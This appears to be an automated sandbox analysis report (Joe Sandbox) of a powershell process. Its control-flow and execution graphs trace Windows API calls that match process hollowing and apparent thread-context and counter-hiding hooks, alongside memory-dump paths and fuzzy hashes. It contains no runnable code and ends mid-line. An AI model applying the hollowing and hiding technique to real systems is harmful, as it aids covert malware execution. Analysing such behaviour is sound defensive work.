                              execution_graph 12958 7ffd9b8be7b8 12959 7ffd9b8be7c1 K32GetModuleInformation 12958->12959 12961 7ffd9b8be882 12959->12961 12962 7ffd9b8bed76 12963 7ffd9b8bed85 MapViewOfFile 12962->12963 12965 7ffd9b8bee63 12963->12965 12966 7ffd9b8be8bc 12968 7ffd9b8be8c5 12966->12968 12967 7ffd9b8be9d3 CreateFileA 12969 7ffd9b8bea5c 12967->12969 12968->12967 12968->12968 12990 7ffd9b8beb0a 12991 7ffd9b8beb19 CreateFileMappingW 12990->12991 12993 7ffd9b8becc9 12991->12993 12970 7ffd9b8c0f30 12971 7ffd9b8c0f3f NtSetContextThread 12970->12971 12973 7ffd9b8c0fca 12971->12973 12974 7ffd9b8c0a4e 12975 7ffd9b8c0a5d NtUnmapViewOfSection 12974->12975 12977 7ffd9b8c0b1a 12975->12977 12978 7ffd9b8c0c6d 12979 7ffd9b8c0c7b NtWriteVirtualMemory 12978->12979 12981 7ffd9b8c0d47 12979->12981 12982 7ffd9b8c0ff4 12983 7ffd9b8c0ffd NtResumeThread 12982->12983 12985 7ffd9b8c10b4 12983->12985 12986 7ffd9b8c0231 12987 7ffd9b8c023f CreateProcessA 12986->12987 12989 7ffd9b8c0960 12987->12989

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 542 7ffd9b8c0c6d-7ffd9b8c0c79 543 7ffd9b8c0c7b-7ffd9b8c0c83 542->543 544 7ffd9b8c0c84-7ffd9b8c0cf8 542->544 543->544 548 7ffd9b8c0cfa-7ffd9b8c0cff 544->548 549 7ffd9b8c0d02-7ffd9b8c0d45 NtWriteVirtualMemory 544->549 548->549 550 7ffd9b8c0d47 549->550 551 7ffd9b8c0d4d-7ffd9b8c0d6a 549->551 550->551
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: be3786c01fe61805798d6f5ca5b0afa444038f970492ad7dc87a1612285d0dde
                              • Instruction ID: 74a3d5da9056dd24b049de61e35c273462f2605a824777497ad055ef4539b32d
                              • Opcode Fuzzy Hash: be3786c01fe61805798d6f5ca5b0afa444038f970492ad7dc87a1612285d0dde
                              • Instruction Fuzzy Hash: 5C31C07191CA4C8FDB18EF98D845AF9BBE0FF59321F04426FD049D3692CB74A8468B85

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 552 7ffd9b8be088-7ffd9b8be0a6
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: SectionUnmapView
                              • String ID:
                              • API String ID: 498011366-0
                              • Opcode ID: b5b19e0b2c297ee83329606b91c78b49da6300eb8824b4f4fe577fb67ad315a0
                              • Instruction ID: 340421bf6c44c5adbe1181a3ce302e424ad334f594ce160e99c19fc6e80e6cf9
                              • Opcode Fuzzy Hash: b5b19e0b2c297ee83329606b91c78b49da6300eb8824b4f4fe577fb67ad315a0
                              • Instruction Fuzzy Hash: 09314872A0D74C8FEB58DBA8D8497B97BE0FB59310F04016BD049C7162D620A946CB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 555 7ffd9b8c0a4e-7ffd9b8c0a5b 556 7ffd9b8c0a66-7ffd9b8c0b18 NtUnmapViewOfSection 555->556 557 7ffd9b8c0a5d-7ffd9b8c0a65 555->557 561 7ffd9b8c0b1a 556->561 562 7ffd9b8c0b20-7ffd9b8c0b3c 556->562 557->556 561->562
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: SectionUnmapView
                              • String ID:
                              • API String ID: 498011366-0
                              • Opcode ID: 0b4e08060a06af7192c35f2913dbcad83c48e9cff238fbd5d42968cb79d2d60f
                              • Instruction ID: e0f345c9c0f709ea2fc11bb0b8a3b8a46797f46a730a26c1194a34f2593361cc
                              • Opcode Fuzzy Hash: 0b4e08060a06af7192c35f2913dbcad83c48e9cff238fbd5d42968cb79d2d60f
                              • Instruction Fuzzy Hash: 8F31073090D7888FDB5ADB68C8557E97FE0EF56320F04429BD049C71A3D664A446CB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 563 7ffd9b8c0ff4-7ffd9b8c0ffb 564 7ffd9b8c1006-7ffd9b8c10b2 NtResumeThread 563->564 565 7ffd9b8c0ffd-7ffd9b8c1005 563->565 569 7ffd9b8c10ba-7ffd9b8c10d6 564->569 570 7ffd9b8c10b4 564->570 565->564 570->569
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 11516a727d80fdbe5b07395fdac626088c8837baeae871eec193c12ff2b7e4e2
                              • Instruction ID: 67a6f418d9648743ec30bc3a7b471c200e962febfc3a1d6bc561d31435f664ee
                              • Opcode Fuzzy Hash: 11516a727d80fdbe5b07395fdac626088c8837baeae871eec193c12ff2b7e4e2
                              • Instruction Fuzzy Hash: BC312871A0C64C8FDB58EF98D8467E9BBE1EF5A320F04416BD009C3292CB70A846CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 571 7ffd9b8be0b8-7ffd9b8c0b18 NtUnmapViewOfSection 576 7ffd9b8c0b1a 571->576 577 7ffd9b8c0b20-7ffd9b8c0b3c 571->577 576->577
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: SectionUnmapView
                              • String ID:
                              • API String ID: 498011366-0
                              • Opcode ID: 30246e57b7ae54ce2793467cd66bd925f2a765a677329d8079f37a8ec1fc0f4f
                              • Instruction ID: a8a2f17dc39a06edc36d8f4a5445f8e0f64408c74409c4075b60b3fbcfbf6034
                              • Opcode Fuzzy Hash: 30246e57b7ae54ce2793467cd66bd925f2a765a677329d8079f37a8ec1fc0f4f
                              • Instruction Fuzzy Hash: B621A571A0CA0C8FDB58DF98D8497B97BE0EB69320F04416FD04ED3262D675A846CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 578 7ffd9b8c0f30-7ffd9b8c0fc8 NtSetContextThread 582 7ffd9b8c0fca 578->582 583 7ffd9b8c0fd0-7ffd9b8c0fec 578->583 582->583
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: ContextThread
                              • String ID:
                              • API String ID: 1591575202-0
                              • Opcode ID: 46a478b9d2963f251f58f619065bb7f32c16b72498703124fc7360dcf13e9332
                              • Instruction ID: 30dc06aaf1ee0ed1fde215d3a61b788d12db489837d54d362ee5cb4a8c4224a9
                              • Opcode Fuzzy Hash: 46a478b9d2963f251f58f619065bb7f32c16b72498703124fc7360dcf13e9332
                              • Instruction Fuzzy Hash: 2D21B131A0CB4C8FDB58DF98D849BE97BF0EB69320F04416BD049D3292D674A846CB91
                              Memory Dump Source
                              • Source File: 00000024.00000002.2687804119.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b980000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9dd9a9617355832009fd0edc98e7179beb55cfaeae9db4c2656dce82efc33f4b
                              • Instruction ID: a26e3514eb6c5e05d98050022ded70d6d6c6e0ae8954fe9f618ff05459a7d15e
                              • Opcode Fuzzy Hash: 9dd9a9617355832009fd0edc98e7179beb55cfaeae9db4c2656dce82efc33f4b
                              • Instruction Fuzzy Hash: 04133871E1DF894BEB719B58989666577D0EF68B04F0A01AED44CC32A3EE34EC41C786

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 433 7ffd9b8c0231-7ffd9b8c023d 434 7ffd9b8c0248-7ffd9b8c0702 433->434 435 7ffd9b8c023f-7ffd9b8c0247 433->435 444 7ffd9b8c0760-7ffd9b8c0792 434->444 445 7ffd9b8c0704-7ffd9b8c0713 434->445 435->434 452 7ffd9b8c07f0-7ffd9b8c0841 444->452 453 7ffd9b8c0794-7ffd9b8c07a3 444->453 445->444 446 7ffd9b8c0715-7ffd9b8c0718 445->446 447 7ffd9b8c071a-7ffd9b8c072d 446->447 448 7ffd9b8c0752-7ffd9b8c075a 446->448 450 7ffd9b8c072f 447->450 451 7ffd9b8c0731-7ffd9b8c0744 447->451 448->444 450->451 451->451 455 7ffd9b8c0746-7ffd9b8c074e 451->455 461 7ffd9b8c089f-7ffd9b8c08d0 452->461 462 7ffd9b8c0843-7ffd9b8c0852 452->462 453->452 454 7ffd9b8c07a5-7ffd9b8c07a8 453->454 456 7ffd9b8c07aa-7ffd9b8c07bd 454->456 457 7ffd9b8c07e2-7ffd9b8c07ea 454->457 455->448 459 7ffd9b8c07bf 456->459 460 7ffd9b8c07c1-7ffd9b8c07d4 456->460 457->452 459->460 460->460 463 7ffd9b8c07d6-7ffd9b8c07de 460->463 468 7ffd9b8c08de-7ffd9b8c095e CreateProcessA 461->468 469 7ffd9b8c08d2-7ffd9b8c08da 461->469 462->461 464 7ffd9b8c0854-7ffd9b8c0857 462->464 463->457 466 7ffd9b8c0859-7ffd9b8c086c 464->466 467 7ffd9b8c0891-7ffd9b8c0899 464->467 470 7ffd9b8c0870-7ffd9b8c0883 466->470 471 7ffd9b8c086e 466->471 467->461 472 7ffd9b8c0966-7ffd9b8c09a3 call 7ffd9b8c09bf 468->472 473 7ffd9b8c0960 468->473 469->468 470->470 474 7ffd9b8c0885-7ffd9b8c088d 470->474 471->470 477 7ffd9b8c09a5 472->477 478 7ffd9b8c09aa-7ffd9b8c09be 472->478 473->472 474->467 477->478
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 041648890c0c147bbc2f39b5c65b70b723d4d3c9daee4dcddddcc8ff06b8536c
                              • Instruction ID: 444f844dad7b5533136bdb8b174eecc84a9bbec868cc6884046e0dbef4291fb2
                              • Opcode Fuzzy Hash: 041648890c0c147bbc2f39b5c65b70b723d4d3c9daee4dcddddcc8ff06b8536c
                              • Instruction Fuzzy Hash: FED10470619A8D8FDB68EF2CCC567E977E0FF59310F14426BD84DC7292DA34A5418B82

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 479 7ffd9b8beb0a-7ffd9b8beb17 480 7ffd9b8beb19-7ffd9b8beb21 479->480 481 7ffd9b8beb22-7ffd9b8bebef 479->481 480->481 485 7ffd9b8bec4a-7ffd9b8becc7 CreateFileMappingW 481->485 486 7ffd9b8bebf1-7ffd9b8bec00 481->486 491 7ffd9b8becc9 485->491 492 7ffd9b8beccf-7ffd9b8bed0b call 7ffd9b8bed27 485->492 486->485 487 7ffd9b8bec02-7ffd9b8bec05 486->487 488 7ffd9b8bec07-7ffd9b8bec1a 487->488 489 7ffd9b8bec3f-7ffd9b8bec47 487->489 493 7ffd9b8bec1c 488->493 494 7ffd9b8bec1e-7ffd9b8bec31 488->494 489->485 491->492 499 7ffd9b8bed0d 492->499 500 7ffd9b8bed12-7ffd9b8bed26 492->500 493->494 494->494 495 7ffd9b8bec33-7ffd9b8bec3b 494->495 495->489 499->500
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: CreateFileMapping
                              • String ID:
                              • API String ID: 524692379-0
                              • Opcode ID: 84dff63c8c7b4c90799a86cd1c4ba91d140a7b8b7b93dfe06d0a1042a0990f70
                              • Instruction ID: db77a8c1069faab17dc4c6a07e5df50e144013c22aedcf1abf2b9da1150552ce
                              • Opcode Fuzzy Hash: 84dff63c8c7b4c90799a86cd1c4ba91d140a7b8b7b93dfe06d0a1042a0990f70
                              • Instruction Fuzzy Hash: 8971F63061CB8D4FDB59EF28CC557E47BE1FF59311F1442AAE84DC72A2DA74A8418B82

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 501 7ffd9b8be8bc-7ffd9b8be8c3 502 7ffd9b8be8c5-7ffd9b8be8cd 501->502 503 7ffd9b8be8ce-7ffd9b8be967 501->503 502->503 507 7ffd9b8be969-7ffd9b8be978 503->507 508 7ffd9b8be9c2-7ffd9b8bea5a CreateFileA 503->508 507->508 509 7ffd9b8be97a-7ffd9b8be97d 507->509 515 7ffd9b8bea5c 508->515 516 7ffd9b8bea62-7ffd9b8bea9e call 7ffd9b8beaba 508->516 510 7ffd9b8be9b7-7ffd9b8be9bf 509->510 511 7ffd9b8be97f-7ffd9b8be992 509->511 510->508 513 7ffd9b8be996-7ffd9b8be9a9 511->513 514 7ffd9b8be994 511->514 513->513 517 7ffd9b8be9ab-7ffd9b8be9b3 513->517 514->513 515->516 521 7ffd9b8beaa5-7ffd9b8beab9 516->521 522 7ffd9b8beaa0 516->522 517->510 522->521
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 7974f058c9100f8b50392d9972138afcaa0b48d7f2dff1597ceaad1f2d853eff
                              • Instruction ID: a8e11d38f4ee84c4d7dd5a8539317aff268d829482b5110813af2e178ee19995
                              • Opcode Fuzzy Hash: 7974f058c9100f8b50392d9972138afcaa0b48d7f2dff1597ceaad1f2d853eff
                              • Instruction Fuzzy Hash: E661D93091CA8D4FDBA8EF28C8557E43BE0FB59311F10426AE84DC3292DA74A9458BD1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 523 7ffd9b8bed76-7ffd9b8bed83 524 7ffd9b8bed85-7ffd9b8bed8d 523->524 525 7ffd9b8bed8e-7ffd9b8bed9f 523->525 524->525 526 7ffd9b8bedaa-7ffd9b8bee61 MapViewOfFile 525->526 527 7ffd9b8beda1-7ffd9b8beda9 525->527 531 7ffd9b8bee69-7ffd9b8bee86 526->531 532 7ffd9b8bee63 526->532 527->526 532->531
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: FileView
                              • String ID:
                              • API String ID: 3314676101-0
                              • Opcode ID: 3c97911e97d077a012c5dc86ee8ca740d2c4b55aff5bc5a81ed49a9068cb4a86
                              • Instruction ID: f4e14248b34380e87c91aa8825bd4cb4b4341ce11c8b5f346980c5fef9f66b43
                              • Opcode Fuzzy Hash: 3c97911e97d077a012c5dc86ee8ca740d2c4b55aff5bc5a81ed49a9068cb4a86
                              • Instruction Fuzzy Hash: 6341283190CB889FDB1DDB68D8166E97BF0FF5A321F14026ED089C31A2DB647846CB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 533 7ffd9b8be7b8-7ffd9b8be7bf 534 7ffd9b8be7ca-7ffd9b8be880 K32GetModuleInformation 533->534 535 7ffd9b8be7c1-7ffd9b8be7c9 533->535 539 7ffd9b8be888-7ffd9b8be8b7 534->539 540 7ffd9b8be882 534->540 535->534 540->539
                              APIs
                              Memory Dump Source
                              • Source File: 00000024.00000002.2685516843.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b8b0000_powershell.jbxd
                              Similarity
                              • API ID: InformationModule
                              • String ID:
                              • API String ID: 3425974696-0
                              • Opcode ID: 272f268a193420cfec0b24c7fd2110af4895eb908242c96fe766e21632e13242
                              • Instruction ID: ca76d755010ccc0c35e1bebf1bf087c133b26230484a225d1f028e3c4a78107c
                              • Opcode Fuzzy Hash: 272f268a193420cfec0b24c7fd2110af4895eb908242c96fe766e21632e13242
                              • Instruction Fuzzy Hash: FF311431A0CA5C8FDB1CDBA898496F97BE1EF69321F04426FD049D3692DB7468468B81

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000024.00000002.2711871127.00007FFD9BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9bb50000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d6ebe8c9cee6180368e3c5e017bcbc1d7099dca15d471be143341c15644cc56
                              • Instruction ID: 2c119f77ca14766fdca6974fbccda4b110ea167699ac1193a431d9cb5b13cb01
                              • Opcode Fuzzy Hash: 1d6ebe8c9cee6180368e3c5e017bcbc1d7099dca15d471be143341c15644cc56
                              • Instruction Fuzzy Hash: C8815622B0EA8D0FEBA5D6EC48646B17BD1FFA5315B0900BAD04DC71E2ED99EC418342

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000024.00000002.2687804119.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b980000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0214080d8257b20506578fe601b86929e55287bb8b13cb5d36b70559165aca5e
                              • Instruction ID: 4161e1670f207efc54cf6884e67585f710508926c51b6e87d567de2cd695404a
                              • Opcode Fuzzy Hash: 0214080d8257b20506578fe601b86929e55287bb8b13cb5d36b70559165aca5e
                              • Instruction Fuzzy Hash: 00716731A0EB895FD7A9DBA894A49603BD1EF65310B1901FED08DCB1E7DE25DC46C381
                              Memory Dump Source
                              • Source File: 00000024.00000002.2687804119.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9b980000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90b3bd52d03771eb999723e66df8c4858317719802960b2c21eabfd6770daff2
                              • Instruction ID: 18b94453ff939eec4d194b108358b455cfa77c0465f239e8551561d152037c3c
                              • Opcode Fuzzy Hash: 90b3bd52d03771eb999723e66df8c4858317719802960b2c21eabfd6770daff2
                              • Instruction Fuzzy Hash: 2C31D252A1FBCA2FE772A7B858641643BE0EF56650B0A01FBD098CB1E3E8691C458351
                              Memory Dump Source
                              • Source File: 00000024.00000002.2711871127.00007FFD9BB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_36_2_7ffd9bb50000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3fc657ba2ad9d0406aad928f34cefb72537b2f967fa1f2a8a2fd2a6fb0203204
                              • Instruction ID: d30f7d96080e218b2a4600f68455eeec7ee72b9f27bc886a9946e069900d994c
                              • Opcode Fuzzy Hash: 3fc657ba2ad9d0406aad928f34cefb72537b2f967fa1f2a8a2fd2a6fb0203204
                              • Instruction Fuzzy Hash: F301DD52F1ED1E0AFBB491EC24753B462C2FFB8616B590072D51DC32D5DC9AED420382

                              Execution Graph

                              Execution Coverage:1.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:1457
                              Total number of Limit Nodes:6
                              execution_graph 8421 26504eaec30 GetCommandLineA GetCommandLineW 8422 26504ea6430 8423 26504ea643d 8422->8423 8424 26504ea6449 8423->8424 8430 26504ea655a 8423->8430 8425 26504ea64cd 8424->8425 8426 26504ea64a6 SetThreadContext 8424->8426 8426->8425 8427 26504ea663e 8429 26504ea665e 8427->8429 8438 26504ea4b20 8427->8438 8428 26504ea6581 VirtualProtect FlushInstructionCache 8428->8430 8442 26504ea5530 GetCurrentProcess 8429->8442 8430->8427 8430->8428 8433 26504ea6677 ResumeThread 8434 26504ea6663 8433->8434 8434->8433 8435 26504ea66b7 8434->8435 8436 26504ea8070 _invalid_parameter_noinfo 8 API calls 8435->8436 8437 26504ea66ff 8436->8437 8440 26504ea4b3c 8438->8440 8439 26504ea4b9f 8439->8429 8440->8439 8441 26504ea4b52 VirtualFree 8440->8441 8441->8440 8445 26504ea554c 8442->8445 8443 26504ea5593 8443->8434 8444 26504ea5562 VirtualProtect FlushInstructionCache 8444->8445 8445->8443 8445->8444 9143 26504eabd34 9144 26504eabd4d 9143->9144 9153 26504eabd49 9143->9153 9145 26504eae864 56 API calls 9144->9145 9146 26504eabd52 9145->9146 9158 26504eaedc8 GetEnvironmentStringsW 9146->9158 9149 26504eabd5f 9151 26504ead2a0 __free_lconv_mon 13 API calls 9149->9151 9150 26504eabd6b 9178 26504eabda8 9150->9178 9151->9153 9155 26504ead2a0 __free_lconv_mon 13 API calls 9156 26504eabd92 9155->9156 9157 26504ead2a0 __free_lconv_mon 13 API calls 9156->9157 9157->9153 9159 26504eabd57 9158->9159 9160 26504eaedf8 9158->9160 9159->9149 9159->9150 9161 26504eaece8 WideCharToMultiByte 9160->9161 9162 26504eaee49 9161->9162 9163 26504eaee53 FreeEnvironmentStringsW 9162->9163 9164 26504eac5d0 14 API calls 9162->9164 9163->9159 9165 26504eaee63 9164->9165 9166 26504eaee74 9165->9166 9167 26504eaee6b 9165->9167 9169 26504eaece8 WideCharToMultiByte 9166->9169 9168 26504ead2a0 __free_lconv_mon 13 API calls 9167->9168 9170 26504eaee72 9168->9170 9171 26504eaee97 9169->9171 9170->9163 9172 26504eaeea5 9171->9172 9173 26504eaee9b 9171->9173 9175 26504ead2a0 __free_lconv_mon 13 API calls 9172->9175 9174 26504ead2a0 __free_lconv_mon 13 API calls 9173->9174 9176 26504eaeea3 FreeEnvironmentStringsW 9174->9176 9175->9176 9176->9159 9179 26504eabdcd 9178->9179 9180 26504ead220 _invalid_parameter_noinfo 13 API calls 9179->9180 9181 26504eabe03 9180->9181 9183 26504eabe6d 9181->9183 9186 26504ead220 _invalid_parameter_noinfo 13 API calls 9181->9186 9187 26504eabe92 9181->9187 9188 26504eac328 __std_exception_copy 38 API calls 9181->9188 9192 26504eabea6 9181->9192 9193 26504eabe0b 9181->9193 9195 26504ead2a0 __free_lconv_mon 13 API calls 9181->9195 9182 26504ead2a0 __free_lconv_mon 13 API calls 9185 26504eabd73 9182->9185 9184 26504ead2a0 __free_lconv_mon 13 API calls 9183->9184 9184->9185 9185->9155 9186->9181 9189 26504eabebc 13 API calls 9187->9189 9188->9181 9190 26504eabe9a 9189->9190 9191 26504ead2a0 __free_lconv_mon 13 API calls 9190->9191 9191->9193 9194 26504ead06c _invalid_parameter_noinfo 17 API calls 9192->9194 9193->9182 9196 26504eabeb9 9194->9196 9195->9181 7563 26504ea2ab4 TlsGetValue TlsGetValue TlsGetValue 7564 26504ea2b0d 7563->7564 7566 26504ea2b79 7563->7566 7564->7566 7567 26504ea2b15 7564->7567 7565 26504ea2b74 7566->7565 7568 26504ea2c32 TlsSetValue TlsSetValue TlsSetValue 7566->7568 7570 26504ea3f88 StrCmpNIW 7566->7570 7567->7565 7567->7568 7571 26504ea3f88 7567->7571 7568->7565 7570->7566 7572 26504ea3faa 7571->7572 7573 26504ea3f95 StrCmpNIW 7571->7573 7572->7567 7573->7572 8446 26504eac828 8447 26504eac82d 8446->8447 8451 26504eac842 8446->8451 8452 26504eac848 8447->8452 8453 26504eac892 8452->8453 8454 26504eac88a 8452->8454 8456 26504ead2a0 __free_lconv_mon 13 API calls 8453->8456 8455 26504ead2a0 __free_lconv_mon 13 API calls 8454->8455 8455->8453 8457 26504eac89f 8456->8457 8458 26504ead2a0 __free_lconv_mon 13 API calls 8457->8458 8459 26504eac8ac 8458->8459 8460 26504ead2a0 __free_lconv_mon 13 API calls 8459->8460 8461 26504eac8b9 8460->8461 8462 26504ead2a0 __free_lconv_mon 13 API calls 8461->8462 8463 26504eac8c6 8462->8463 8464 26504ead2a0 __free_lconv_mon 13 API calls 8463->8464 8465 26504eac8d3 8464->8465 8466 26504ead2a0 __free_lconv_mon 13 API calls 8465->8466 8467 26504eac8e0 8466->8467 8468 26504ead2a0 __free_lconv_mon 13 API calls 8467->8468 8469 26504eac8ed 8468->8469 8470 26504ead2a0 __free_lconv_mon 13 API calls 8469->8470 8471 26504eac8fd 8470->8471 8472 26504ead2a0 __free_lconv_mon 13 API calls 8471->8472 8473 26504eac90d 8472->8473 8478 26504eac6f8 8473->8478 8492 26504eac558 EnterCriticalSection 8478->8492 8870 26504eb0fa8 8871 26504eb0fcc 8870->8871 8872 26504ea8070 _invalid_parameter_noinfo 8 API calls 8871->8872 8873 26504eb100e 8872->8873 8874 26504ea33a8 8875 26504ea33cf 8874->8875 8876 26504ea349c 8875->8876 8877 26504ea33ec PdhGetCounterInfoW 8875->8877 8877->8876 8878 26504ea340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8877->8878 8879 26504ea3440 StrCmpW 8878->8879 8880 26504ea3488 GetProcessHeap HeapFree 8878->8880 8879->8880 8881 26504ea3455 8879->8881 8880->8876 8881->8880 8882 26504ea3950 12 API calls 8881->8882 8882->8881 7574 26504eaaaac 7575 26504eaaad9 __except_validate_context_record 7574->7575 7591 26504ea9324 7575->7591 7577 26504eaaade 7580 26504eaab38 7577->7580 7581 26504eaabc6 7577->7581 7588 26504eaab8c 7577->7588 7578 26504eaac34 7578->7588 7619 26504eaa22c 7578->7619 7579 26504eaabb3 7606 26504ea95d0 7579->7606 7580->7579 7580->7588 7589 26504eaab5a __GetCurrentState 7580->7589 7585 26504eaabe5 7581->7585 7613 26504ea99cc 7581->7613 7585->7578 7585->7588 7616 26504ea99e0 7585->7616 7586 26504eaacdd 7589->7586 7594 26504eaafb8 7589->7594 7676 26504ea9340 7591->7676 7593 26504ea932d 7593->7577 7595 26504ea99cc Is_bad_exception_allowed 9 API calls 7594->7595 7596 26504eaafe7 __GetCurrentState 7595->7596 7597 26504ea9324 _CallSETranslator 9 API calls 7596->7597 7601 26504eab004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7597->7601 7598 26504eab0fb 7599 26504ea9324 _CallSETranslator 9 API calls 7598->7599 7600 26504eab100 7599->7600 7602 26504ea9324 _CallSETranslator 9 API calls 7600->7602 7603 26504eab10b __FrameHandler3::GetHandlerSearchState 7600->7603 7601->7598 7601->7603 7604 26504ea99cc 9 API calls Is_bad_exception_allowed 7601->7604 7701 26504ea99f4 7601->7701 7602->7603 7603->7588 7604->7601 7704 26504ea9634 7606->7704 7608 26504ea95ef __FrameHandler3::FrameUnwindToEmptyState 7708 26504ea9540 7608->7708 7611 26504eaafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 7612 26504ea9624 7611->7612 7612->7588 7614 26504ea9324 _CallSETranslator 9 API calls 7613->7614 7615 26504ea99d5 7614->7615 7615->7585 7617 26504ea9324 _CallSETranslator 9 API calls 7616->7617 7618 26504ea99e9 7617->7618 7618->7578 7712 26504eab144 7619->7712 7621 26504eaa6f4 7622 26504eaa645 7622->7621 7662 26504eaa643 7622->7662 7765 26504eaa6fc 7622->7765 7623 26504eaa373 7623->7622 7667 26504eaa3ab 7623->7667 7624 26504ea9324 _CallSETranslator 9 API calls 7626 26504eaa687 7624->7626 7626->7621 7777 26504ea8070 7626->7777 7627 26504eaa575 7632 26504eaa592 7627->7632 7634 26504ea99cc Is_bad_exception_allowed 9 API calls 7627->7634 7627->7662 7628 26504ea9324 _CallSETranslator 9 API calls 7630 26504eaa2da 7628->7630 7630->7626 7635 26504ea9324 